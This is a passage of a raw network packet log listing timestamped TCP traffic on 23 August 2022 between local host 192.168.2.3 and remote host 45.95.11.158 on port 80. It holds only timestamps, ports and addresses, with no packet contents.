Aug 23, 2022 03:42:54.477013111 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.477021933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.477045059 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.477086067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.477093935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.477124929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.477168083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.477205992 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.477224112 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.477230072 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.477258921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.477267027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.477298975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508331060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508373022 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508400917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508431911 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508460999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508492947 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508523941 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508533955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508596897 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508627892 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508660078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508692026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508716106 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508733034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508744955 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508749008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508755922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508773088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508797884 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508802891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508824110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508825064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508862972 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508877039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508883953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508907080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508929968 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508938074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508954048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508960962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.508986950 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.508990049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.509001017 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.509021044 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.509051085 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.509057045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.509068012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.509073973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.509104013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.509133101 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.509150982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.509161949 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.509162903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.509169102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.509182930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.509186029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.509217024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.509243011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.540329933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540406942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540463924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540477991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.540518045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540535927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.540571928 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540576935 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.540626049 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540632963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.540669918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540693045 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.540725946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540739059 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.540788889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540810108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.540848970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540852070 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.540894985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540915012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.540947914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.540952921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.540997982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541002989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541060925 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541100025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541105986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541152000 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541176081 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541197062 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541234016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541238070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541295052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541296005 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541338921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541356087 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541389942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541400909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541450977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541457891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541507006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541507006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541547060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541563988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541600943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541600943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541654110 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541656017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541714907 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541718006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541764021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541802883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541825056 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541836023 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541886091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541891098 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541939974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.541949987 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.541982889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.542000055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.542048931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.542814016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.542876005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.542891026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.542931080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.542944908 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.542988062 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.542990923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.543041945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.543056965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.543098927 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.785907984 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.820116997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.907917976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.907978058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.908025026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.908063889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.908080101 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.908104897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.908113003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.908118963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.908123970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.908148050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.908170938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.908189058 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.908210993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.908229113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.908247948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.908271074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.908303976 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.908304930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.908338070 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.908375025 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.940526962 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.940602064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.940645933 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.940675020 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.940682888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.940715075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.940721989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.940756083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.940758944 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.940794945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.940823078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.940830946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.940835953 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.940865993 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.940876961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.940887928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.940920115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.940928936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.940962076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.940973043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941008091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941016912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941051006 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941061974 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941083908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941107988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941123009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941135883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941165924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941179037 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941209078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941229105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941240072 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941282988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941282988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941293001 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941322088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941363096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941364050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941381931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941395998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941427946 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941435099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941450119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941478014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941493034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941517115 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941529989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941546917 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.941567898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.941596031 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.972291946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.972354889 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.972397089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.972435951 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.972476959 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.972502947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.972520113 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.972553015 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.972562075 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.972579002 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.972954988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973000050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973023891 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973062992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973108053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973150969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973155022 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973181009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973190069 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973212957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973237038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973275900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973280907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973294020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973320007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973356962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973362923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973372936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973392963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973403931 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973433018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973438978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973474026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973480940 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973515034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973543882 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973553896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973565102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973582983 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973592997 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973623991 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973668098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973687887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973725080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973737955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973768950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973784924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973808050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973824978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973848104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.973870039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.973895073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.974380970 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.974488020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.974879980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.974922895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.974953890 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.974961996 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.974970102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.975002050 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.975014925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.975044012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.975050926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.975085974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.975096941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.975116968 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.975131989 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.975167036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.975728035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.975770950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.975811005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.975811005 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.975825071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.975838900 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.975862980 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.975898981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.976418018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.976459980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.976507902 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.976532936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.976768017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.976835012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.976913929 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.976954937 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.976974010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.977010012 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.977010012 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.977052927 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.977071047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.977093935 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.977108955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.977134943 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.977153063 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.977166891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:54.977200985 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:54.977353096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.003931999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.003997087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004043102 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004070997 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004111052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004112959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004148960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004149914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004168034 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004189014 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004195929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004219055 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004247904 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004260063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004270077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004301071 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004304886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004342079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004347086 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004369974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004388094 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004409075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004411936 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004450083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004452944 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004488945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004494905 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004517078 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004543066 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004556894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.004560947 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.004596949 CEST	80	49774	45.95.11.158	192.168.2.3
